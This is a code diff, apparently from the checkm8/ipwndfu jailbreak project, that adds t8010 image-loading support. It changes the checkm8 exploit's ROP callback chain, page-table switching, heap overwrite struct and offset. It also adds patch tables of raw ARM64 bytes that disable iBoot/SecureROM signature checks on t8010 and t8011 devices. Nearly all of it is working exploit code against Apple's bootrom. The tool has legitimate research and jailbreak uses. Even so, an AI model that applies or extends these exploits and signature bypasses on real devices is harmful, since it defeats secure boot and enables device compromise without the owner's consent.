Add image loading support for t8010

checkm8.py

@@ -313,15 +313,20 @@ def payload(cpid):
     t8010_handle_interface_request = 0x10000DFB8
     t8010_callbacks = [
       (t8010_dc_civac, 0x1800B0600),
+      (t8010_dc_civac, 0x1800B0000),
       (t8010_dmb, 0),
       (t8010_enter_critical_section, 0),
+
       (t8010_write_ttbr0, 0x1800B0000),
       (t8010_tlbi, 0),
       (0x1820B0610, 0),
-      (t8010_write_ttbr0, 0x1800A0000),
+
+      (t8010_write_ttbr0, 0x1800A8000), # A custom pagetable we just set up
       (t8010_tlbi, 0),
-      (t8010_exit_critical_section, 0),
       (0x1800B0000, 0),
+      (t8010_write_ttbr0, 0x1800A0000), # Real pagetable
+
+      (t8010_exit_critical_section, 0),
     ]
     t8010_handler = asm_arm64_x7_trampoline(t8010_handle_interface_request) + asm_arm64_branch(0x10, 0x0) + prepare_shellcode('usb_0xA1_2_arm64', constants_usb_t8010)[4:]
     t8010_shellcode = prepare_shellcode('checkm8_arm64', constants_checkm8_t8010)
@@ -433,15 +438,15 @@ def all_exploit_configs():
   s5l895xx_overwrite = struct.pack('<20xI4x', 0x10000000)
   t800x_overwrite    = struct.pack('<20xI4x', 0x48818000)
   s5l8960x_overwrite = struct.pack('<32xQ8x', 0x180380000)
-  t8010_overwrite    = struct.pack('<32x2Q16x32x2QI',    t8010_nop_gadget, 0x1800B0800, t8010_nop_gadget, 0x1800B0800, 0xbeefbeef)
+  t8010_overwrite    = struct.pack('<32x2Q', t8010_nop_gadget, 0x1800B0800)
   t8011_overwrite    = struct.pack('<32x2Q', t8011_nop_gadget, 0x1800B0800)
   t8015_overwrite    = struct.pack('<32x2Q16x32x2Q12xI', t8015_nop_gadget, 0x18001C020, t8015_nop_gadget, 0x18001C020, 0xbeefbeef)
 
   s5l8947x_overwrite_offset = 0x660
   s5l895xx_overwrite_offset = 0x640
   t800x_overwrite_offset    = 0x5C0
   s5l8960x_overwrite_offset = 0x580
-  t8010_overwrite_offset    = 0x580
+  t8010_overwrite_offset    = 0x5c0
   t8011_overwrite_offset    = 0x540
   t8015_overwrite_offset    = 0x500
 

rmsigchks.py

@@ -30,9 +30,34 @@ def all_exploit_configs():
             b"\x1f\x20\x03\xd5", # nop
         ])
     }
+
+    t8010si_patches = {
+	0x100006ca0: "\x1f\x20\x03\xd5",
+	0x100006c80: b"".join([
+            b"\x21\x00\x80\x52", # mov w1, 1
+            b"\xe1\x9f\x02\x39", # strb w1, [sp,#0xA7]
+            b"\x1f\x20\x03\xd5", # nop
+            b"\xe1\xa7\x02\x39", # strb w1, [sp,#0xA9]
+            b"\xe1\xab\x02\x39", # strb w1, [sp,#0xAA]
+            b"\x1f\x20\x03\xd5", # nop
+            b"\x1f\x20\x03\xd5", # nop
+            b"\x1f\x20\x03\xd5", # nop
+            b"\x1f\x20\x03\xd5", # nop
+        ])
+    }
+
+    t8011_patches = {
+        0x100006df8: "\x21\x00\x80\x52\xe1\xb7\x03\x39\xe1\xb3\x03\x39\xe1\xbb\x03\x39",
+        0x100006e0c: "\x1f\x20\x03\xd5", # nop
+        0x100006e10: "\x1f\x20\x03\xd5", # nop
+        0x100006e14: "\x1f\x20\x03\xd5", # nop
+        0x10000f2d0: "\x00\x00\x80\xd2\xc0\x03\x5f\xd6"
+    }
 
     return [
         DeviceConfig("iBoot-1704.10", 0x8960, s5l8960x_patches),
+	DeviceConfig("iBoot-2696.0.0.1.33", 0x8010, t8010si_patches),
+        DeviceConfig("iBoot-3135.0.0.2.3", 0x8011, t8011_patches),
     ]
 
 def exploit_config(serial_number):
@@ -80,3 +105,4 @@ def main():
 
 if __name__ == "__main__":
 	main()
+